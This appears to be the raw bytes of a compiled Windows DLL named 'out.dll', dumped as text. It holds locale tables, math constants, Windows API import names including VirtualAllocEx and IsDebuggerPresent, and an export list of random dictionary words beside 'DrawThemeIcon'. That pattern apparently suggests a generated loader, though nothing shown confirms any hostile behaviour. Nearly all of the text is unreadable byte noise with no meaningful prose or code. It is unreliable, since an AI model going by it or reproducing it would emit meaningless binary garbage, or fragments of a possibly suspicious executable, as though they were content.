G6  (G7  4G8  @G9  LG:  XG;  dG>  pG?  |G@  �GA  �GC  �GD  �GE  �GF  �GG  �GI  �GJ  �GK   HL  HN  HO  $HP  0HR  <HV  HHW  THZ  dHe  tHk  �Hl  �H�  �H  �H  �;  �H	  �H
  �H  �H  �H  �H   I  I  I  0I,  <I;  TI>  `IC  lIk  �I  �I  �I  �I	  �I
  �I  �I  �I;  �Ik   J  J  J  (J	  4J
  @J  LJ  XJ;  dJ  tJ  �J  �J	  �J
  �J  �J  �J;  �J  �J	  �J
  �J  K  K;  ,K  <K	  HK
  TK  `K;  xK   �K	   �K
   �K;   �K$  �K	$  �K
$  �K;$  �K(  �K	(  �K
(  L,  L	,   L
,  ,L0  8L	0  DL
0  PL4  \L	4  hL
4  tL8  �L
8  �L<  �L
<  �L@  �L
@  �L
D  �L
H  �L
L  �L
P  �L|  �L|  Ma r     b g     c a     z h - C H S     c s     d a     d e     e l     e n     e s     f i     f r     h e     h u     i s     i t     j a     k o     n l     n o     p l     p t     r o     r u     h r     s k     s q     s v     t h     t r     u r     i d     b e     s l     e t     l v     l t     f a     v i     h y     a z     e u     m k     a f     k a     f o     h i     m s     k k     k y     s w     u z     t t     p a     g u     t a     t e     k n     m r     s a     m n     g l     k o k   s y r   d i v       a r - S A   b g - B G   c a - E S   c s - C Z   d a - D K   d e - D E   e l - G R   f i - F I   f r - F R   h e - I L   h u - H U   i s - I S   i t - I T   n l - N L   n b - N O   p l - P L   p t - B R   r o - R O   r u - R U   h r - H R   s k - S K   s q - A L   s v - S E   t h - T H   t r - T R   u r - P K   i d - I D   u k - U A   b e - B Y   s l - S I   e t - E E   l v - L V   l t - L T   f a - I R   v i - V N   h y - A M   a z - A Z - L a t n     e u - E S   m k - M K   t n - Z A   x h - Z A   z u - Z A   a f - Z A   k a - G E   f o - F O   h i - I N   m t - M T   s e - N O   m s - M Y   k k - K Z   k y - K G   s w - K E   u z - U Z - L a t n     t t - R U   b n - I N   p a - I N   g u - I N   t a - I N   t e - I N   k n - I N   m l - I N   m r - I N   s a - I N   m n - M N   c y - G B   g l - E S   k o k - I N     s y r - S Y     d i v - M V     q u z - B O     n s - Z A   m i - N Z   a r - I Q   d e - C H   e n - G B   e s - M X   f r - B E   i t - C H   n l - B E   n n - N O   p t - P T   s r - S P - L a t n     s v - F I   a z - A Z - C y r l     s e - S E   m s - B N   u z - U Z - C y r l     q u z - E C     a r - E G   z h - H K   d e - A T   e n - A U   e s - E S   f r - C A   s r - S P - C y r l     s e - F I   q u z - P E     a r - L Y   z h - S G   d e - L U   e n - C A   e s - G T   f r - C H   h r - B A   s m j - N O     a r - D Z   z h - M O   d e - L I   e n - N Z   e s - C R   f r - L U   b s - B A - L a t n     s m j - S E     a r - M A   e n - I E   e s - P A   f r - M C   s r - B A - L a t n     s m a - N O     a r - T N   e n - Z A   e s - D O   s r - B A - C y r l     s m a - S E     a r - O M   e n - J M   e s - V E   s m s - F I     a r - Y E   e n - C B   e s - C O   s m n - F I     a r - S Y   e n - B Z   e s - P E   a r - J O   e n - T T   e s - A R   a r - L B   e n - Z W   e s - E C   a r - K W   e n - P H   e s - C L   a r - A E   e s - U Y   a r - B H   e s - P Y   a r - Q A   e s - B O   e s - S V   e s - H N   e s - N I   e s - P R   z h - C H T     s r      EB   pD,   0Tq   C    <T�   HT�   TT�   `T�   lT�   xT�   �T�   �T�   �T�   �T�   �T�   �T�   �TC   �T�   �T�   �T�   XD)   �T�   Uk   D!   ,Uc   C   8UD   DU}   PU�    C   hUE   8C   tUG   �U�   @C   �UH   HC   �U�   �U�   �UI   �U�   �U�   EA   �U�   PC   �UJ   XC   �U�   �U�   V�   V�    V�   ,V�   8V�   DV�   PV�   \V�   hVK   tV�   �V�   `C	   �V�   �V�   �V�   �V�   �V�   �V�   �V�   �V�   �V�   �V�   W�   W�   W�   (W�   4W�   @W�   LW�   XW�   dW�   (D#   pWe   `D*   |Wl   @D&   �Wh   hC
   �WL   �D.   �Ws   pC   �W�   �W�   �W�   �WM   �W�   �W�    E>   �W�   �D7    X   xC   XN   �D/   Xt   �C   $X�   0XZ   �C   <XO   PD(   HXj   D   TXa   �C   `XP   �C   lX�   xXQ   �C   �XR   xD-   �Xr   �D1   �Xx   �D:   �X�   �C   E?   �X�   �XS   �D2   �Xy   8D%   �Xg   0D$   �Xf   �X�   hD+    Ym   Y�   �D=   Y�   �D;   $Y�   �D0   0Y�   <Yw   HYu   TYU   �C   `Y�   lYT   xY�   �C   �Y�   �D6   �Y~   �C   �YV   �C   �YW   �Y�   �Y�   �Y�   �Y�   �C   �YX   �C   �YY   �D<   Z�   Z�    Zv   ,Z�   �C   8Z[    D"   DZd   PZ�   `Z�   pZ�   �Z�   �Z�   �Z�   �C   �Z\   M�   �Z�   �Z�   �Z�   [�   �C   [�   ([]   �D3   4[z   E@   @[�   �D8   P[�   �D9   \[�   �C   h[^   t[n    D   �[_   �D5   �[|   �;    �[b   D   �[`   �D4   �[�   �[{   HD'   �[i   �[o   �[   \�   \�   $\�   0\�   <\�   H\F   T\p   a f - z a   a r - a e   a r - b h   a r - d z   a r - e g   a r - i q   a r - j o   a r - k w   a r - l b   a r - l y   a r - m a   a r - o m   a r - q a   a r - s a   a r - s y   a r - t n   a r - y e   a z - a z - c y r l     a z - a z - l a t n     b e - b y   b g - b g   b n - i n   b s - b a - l a t n     c a - e s   c s - c z   c y - g b   d a - d k   d e - a t   d e - c h   d e - d e   d e - l i   d e - l u   d i v - m v     e l - g r   e n - a u   e n - b z   e n - c a   e n - c b   e n - g b   e n - i e   e n - j m   e n - n z   e n - p h   e n - t t   e n - u s   e n - z a   e n - z w   e s - a r   e s - b o   e s - c l   e s - c o   e s - c r   e s - d o   e s - e c   e s - e s   e s - g t   e s - h n   e s - m x   e s - n i   e s - p a   e s - p e   e s - p r   e s - p y   e s - s v   e s - u y   e s - v e   e t - e e   e u - e s   f a - i r   f i - f i   f o - f o   f r - b e   f r - c a   f r - c h   f r - f r   f r - l u   f r - m c   g l - e s   g u - i n   h e - i l   h i - i n   h r - b a   h r - h r   h u - h u   h y - a m   i d - i d   i s - i s   i t - c h   i t - i t   j a - j p   k a - g e   k k - k z   k n - i n   k o k - i n     k o - k r   k y - k g   l t - l t   l v - l v   m i - n z   m k - m k   m l - i n   m n - m n   m r - i n   m s - b n   m s - m y   m t - m t   n b - n o   n l - b e   n l - n l   n n - n o   n s - z a   p a - i n   p l - p l   p t - b r   p t - p t   q u z - b o     q u z - e c     q u z - p e     r o - r o   r u - r u   s a - i n   s e - f i   s e - n o   s e - s e   s k - s k   s l - s i   s m a - n o     s m a - s e     s m j - n o     s m j - s e     s m n - f i     s m s - f i     s q - a l   s r - b a - c y r l     s r - b a - l a t n     s r - s p - c y r l     s r - s p - l a t n     s v - f i   s v - s e   s w - k e   s y r - s y     t a - i n   t e - i n   t h - t h   t n - z a   t r - t r   t t - r u   u k - u a   u r - p k   u z - u z - c y r l     u z - u z - l a t n     v i - v n   x h - z a   z h - c h s     z h - c h t     z h - c n   z h - h k   z h - m o   z h - s g   z h - t w   z u - z a   UUUUUUſ      ��?UUUUUU�?��*�l�l�V�4�V���>���>���m0_$@      8C  `a��=  `a��=  @T�!�?sp.�c;      `C      �<�������?       �      �?      ��������               ���5�h!����?5�h!����?      �?      @          �?5�h!���>@�������             ��      �@      �                    sqrt            log10                 �?      �?3      3                      �                     �   |;   �;   p;   t;   �^   �^!    _   �;   �;   _   _   �;   _   _     _   $_   ,_   4_   <_   D_   L_   T_   \_   d_"   l_#   p_$   t_%   x_&   �_sinh    cosh    tanh    atan    atan2   sin cos tan ceil    floor   fabs    modf    ldexp   _cabs   _hypot  fmod    frexp   _y0 _y1 _yn _logb   _nextafter         �D        � 0  C O N O U T $               ������ ������      ��?     ��?������B������B   ����   ���� x�PD�?X�1�=        ����������������              �?      �?                      0C      0C      ��      �     �     ��Η��5@=�)d	��U�5j��%��5��j�?��~��@5�w��z�A.�lzZ?               ��       ���ܧ׹�fq�@      ��@�6C����?      �?exp          P�����            ��������       �                          �
�|?�Q-8>=  ޶�W�?0��	k8= ��ޮp�?�x�9=  >�.ښ?pn��5= �Y�ح�?�  	Q*=  c����??���b6= ��Y�?�T�?�=  ��>�?����W�!= @�-32�?D���z= ��p(�?vP�(��= `����?�US?�>= �e��?�g���7= `ŀ'��?�bͬ�/= ��^s�?�}�#��= �J�wk�?zn��= ��Nָ?�LN�� 9= @$"�3�?5Wg4p�6= ��T���?�Nv$^)= ��&�?��.�)��< �l��B�?�M���%= `j���?�w����*=  <śm�?E��2=  ެ>�?����E�= �t?��?����= �O�Q�?�w(@	��< ��0��?Ac��0= Pyp��?dry?�= ��St)�?4K��	�>= ���$��?Qh�BC .= 0	ub�?-����0=  ���?a>-�?=  ����?Й��,��<  (lX �?�T@b� == P����?�3�h,%= ��f�?�?�#���� = �V��?ߠϡ��6= ����Y�?���z $= ��G��? $�l35= @��n�?[+���3= �Rŷ �?s�dLi�== p�|��?r�x"#�2= @.���?|�U��2=  lԝ��?r��F�= �a��?����4= ��Y��?sl׼#{ = `~R=�?�.�i�1= ��,��?���� = ��vX�? ���= p����?h���}s"= �	E[
�?%S#[k= ��7�H�?����j= �!V1��?��}�a2= �jq��?2�0�J�5= ������?����5= x¾/@�?��"B <1= �i�z�?�\-!y�!= X�0z��?~��b>�== �:���?�#.X'= HBO&�?��(~= x�bb�?.�= �C�q��?y7��i9+= �v���?����:= 0����?2ض��8= x�PD�?X�1�=     ��?     ��?     Q�?     Q�?    ���?    ���?    ���?    ���?    ��?    ��?    ���?    ���?    �]�?    �]�?    P�?    P�?     ��?     ��?    �U�?    �U�?    (��?    (��?    `��?    `��?    �_�?    �_�?    ��?    ��?    ���?    ���?    �z�?    �z�?    �1�?    �1�?    p��?    p��?    ��?    ��?    (e�?    (e�?    @#�?    @#�?    ���?    ���?    `��?    `��?    hk�?    hk�?    �,�?    �,�?    x��?    x��?    ���?    ���?     ��?     ��?    �N�?    �N�?    x�?    x�?    p��?    p��?    ��?    ��?    �~�?    �~�?    HN�?    HN�?    ��?    ��?    ���?    ���?    ���?    ���?    p��?    p��?    Xi�?    Xi�?    �?�?    �?�?    ��?    ��?     ��?     ��?    ���?    ���?    8��?    8��?    s�?    s�?    pI�?    pI�?    �&�?    �&�?    � �?    � �?    ��?    ��?    �o�?    �o�?     *�?     *�?    ���?    ���?    `��?    `��?     Z�?     Z�?    ��?    ��?    0��?    0��?    ���?    ���?    PY�?    PY�?    ��?    ��?    `��?    `��?    ��?    ��?    pm�?    pm�?     /�?     /�?    ���?    ���?     ��?     ��?      �?    ���c                       �                                                           t��l   x�                                                                                   4m                    |                                                                        ��j           �j�j    �        ����    @   �j            ���j           �j�j�j    ��       ����    @   �j            Њ(k           8kHk�j�j    Њ       ����    @   (k            0�xk           �k�k�j    0�       ����    @   xk            P��k           �k�k�k�j    P�       ����    @   �k            p�l           $l4l�k�j    p�       ����    @   l            ��dl           tl|l    ��        ����    @   dl            ���l           �l�l�j    ��       ����    @   �l� � �- @A � � � �  - g � � C O l � � � �    ��        Lm       ��  � �   o                      �����"�   xm                       "�                               �����"�   �m                           @     n   n0nLn    Њ    ����       �    ��    ����       �     �    ����         ���� "�   hn                       �����"�   �n                       "�   �n                       ����                      (    3"�   @o                       �����    �    �    �    �    �    �    �"�a   �o                       ����@    H    P    X    c    n    y    �    �    �    �    �    �    �    �    �    �    �    �                )    4    ?    J    U    `    k    v    �    �    �    �    �    �    �    �    �    �    �    �                &    1    <    G    R    ]    h    s    ~    �    �    �    �    �    �    �    �    �    �    �                #    .    9    D    O    Z    e    p    {    �    �    �    �    �    �    �    �    �    �    �    �    
             +    6    A    L    W@           U+ ����    ����                  �r"�   �r   �r               ���� "�   s                                 @s   0nLn    0�    ����       L    �    xs   �sLsLn    P�    ����           �    �s   �sLsLn    p�    ����       g����    ����    ������    ����    ����    ����    �    ����    ����    ����    U	        H	����    ����    ����1
P
    ����    ����    �����/�/    ����    ����    ����    �>    y>�>����    ����    ����    �<    <(<@           v=����    ����                  �t"�   �t   �t               ����    ����    �����3�3    ����    ����    ����C4G4    �    |u   �uLn    ��    ����       @;    ����    ����    ����    <������0"�   �u                       ����    ����    ������    ����    ����    ����    ������0�����0"�   ,v                       �����0"�   `v                           ����    ����    ����    ��    ����    ����    ����    D�    ����    ����    ����?�C�    ����    ����    ����    ��    ����    ����    ����    �    ����    ����    ����    c�    ����    ����    ����    ��    ����    ����    ����    i�    ����    ����    ����    ��    ����    ����    ����    g�    ����    ����    ����    ]�    ����    ����    ����    ��    ����    ����    ����    ��    ����    ����    ����    �    ����    ����    ����    ��    ����    ����    ����    ��    ����    ����    ����    ��    ����    ����    ����    ��    ����    ����    ����    ��    ����    ����    ����    ��    ����    ����    ����    v�    ����    ����    ����        ����    ����    ����y�                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        ����    ��          8� d� �� �g  p�  �   �  @�  ��  ��  @�   �   �  ��  �� �� ǆ ц ن � � �� � � �           	 
 out.dll DrawThemeIcon anallergic apneustic elytrin homecrofting longway omnicorporeal onisciform priscan pyrenopeziza unwakened                                                                                                                                                                                                                           �     X� h� z� �� �� �� Γ � �� � $� :� H� r� �� �� �� ��  Δ ڔ �� �� �� ^� �� p� d� P� @� 2� &� �� �� ҕ � � � 8� R� h� |� �� �� ��  Җ � �� � :� F� T� b� l� z� �� �� ��  ؗ � � � � $� 4� @� T� d� v� �� �� �� �� �� ژ �� � � ș     n� �� F� �  �:� X�     �� �     E�         � � L�         � l� ��         ,�  � 0�         �� P�                     �     X� h� z� �� �� �� Γ � �� � $� :� H� r� �� �� �� ��  Δ ڔ �� �� �� ^� �� p� d� P� @� 2� &� �� �� ҕ � � � 8� R� h� |� �� �� ��  Җ � �� � :� F� T� b� l� z� �� �� ��  ؗ � � � � $� 4� @� T� d� v� �� �� �� �� �� ژ �� � � ș     n� �� F� �  �:� X�     �� �     �VirtualAlloc  �VirtualAllocEx  �GetStdHandle  �GetCommandLineA mExpandEnvironmentStringsA MGetFileAttributesA  �LeaveCriticalSection  $GetCurrentProcess %GetCurrentProcessId (GetCurrentThread  )GetCurrentThreadId  .GetVersion  �GetModuleFileNameA  �GetModuleHandleA  �GetModuleHandleW  �LoadLibraryA  �LocalAlloc  CSetHandleCount  IlstrcmpA  LlstrcmpiA UlstrlenA  �IsBadWritePtr KERNEL32.dll  MessageBoxA ULoadIconA USER32.dll  eRegCloseKey ADVAPI32.dll  UStrToIntA G PathFileExistsA J PathFindExtensionA  P PathFindOnPathA X PathGetDriveNumberA SHLWAPI.dll �IsProcessorFeaturePresent �IsDebuggerPresent �UnhandledExceptionFilter  �SetUnhandledExceptionFilter �GetStartupInfoW aQueryPerformanceCounter �GetSystemTimeAsFileTime xInitializeSListHead �TerminateProcess  wRaiseException  �RtlUnwind �InterlockedFlushSList nGetLastError  HSetLastError  9EncodePointer =EnterCriticalSection  DeleteCriticalSection tInitializeCriticalSectionAndSpinCount �TlsAlloc  �TlsGetValue �TlsSetValue �TlsFree �FreeLibrary �GetProcAddress  �LoadLibraryExW  jExitProcess �GetModuleHandleExW  �GetModuleFileNameW  ^HeapFree  ZHeapAlloc MultiByteToWideChar �LCMapStringW  �MoveFileExW DecodePointer �FindClose �FindFirstFileExW  �FindNextFileW �IsValidCodePage �GetACP  �GetOEMCP  �GetCPInfo �GetCommandLineW WideCharToMultiByte DGetEnvironmentStringsW  �FreeEnvironmentStringsW �GetProcessHeap  [GetFileType �GetStringTypeW  cHeapSize  aHeapReAlloc cSetStdHandle  �FlushFileBuffers  ,WriteFile GetConsoleOutputCP  GetConsoleMode  9SetFilePointerEx  � CreateFileW � CloseHandle +WriteConsoleW                                                      � �P  � �h  �   �  �   �  �   �  �    �     �   8 �                 P �                 h �             	    � �   � �   � �   � �   � �   � �    �   ( �	   @ �                 X �                 p �              k   � �                 � �                 � �                �                    �                    �                                                            (                    8                    H                    X                    h                    x                  �                    �                    �                    �    �                    �  �    �       �    �      (� ($ �      P� (L  �      x (B  �      �V �%  �      H| �  �      �� �  �      �� �	  �      (� �  �      � h  �      H� T   �      �� L   �      � �   �      l� 8  �      �� �  �      \� 6  �       A F X _ D I A L O G _ L A Y O U T  S Y M P R O     PA   PAD(                                 o� ��� y� �� ��� y�� ��� ��� �� ��� ��� ��� A�� ��� ��� �� ��� ��� �� yyy ��� ��� [\^ ��� ��� �� �� ��� ��� ��� BBB $�� ��� ��� ��� ��� b�� ��� Z�� ��� ��� Tl _�� ��� ddf ��� ��� ��� ��� ��� ��� ��� ��� \�� ��� ��� ���   # ��� ��� ��� ��� Pd ��� 8F ((+ $$' ''( %�� ��� �� �� Zt  �� �� '�� $��  ,4 a�� X�� e� ��� ��� ��� ��� ��� ��� !!$ aac a} ��� ��� ��� ��� ��� ��� XXZ B�� n�� ��� ��� ��� ���  y� �� ��� ���                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                     kkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk'DDDDOVRkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk" $Q2kkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkJ!kkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk&*/kkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk<	kkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk/kkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk	O"kkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk2%kkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkDkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkDkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkDkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk43kkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk:kkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk
kkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk!kkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk4kkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk+Nkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk	kkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkR&kkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk	7kkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk4kkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkQkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk""KkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkT<+
Jkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk<&/'kkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk1KkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkKkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkJ%2*kkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk kkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk/	kkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkKQ++kkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkO*kkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkT'	Dkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk+$kkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkD2!kkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkZkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk'!kkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk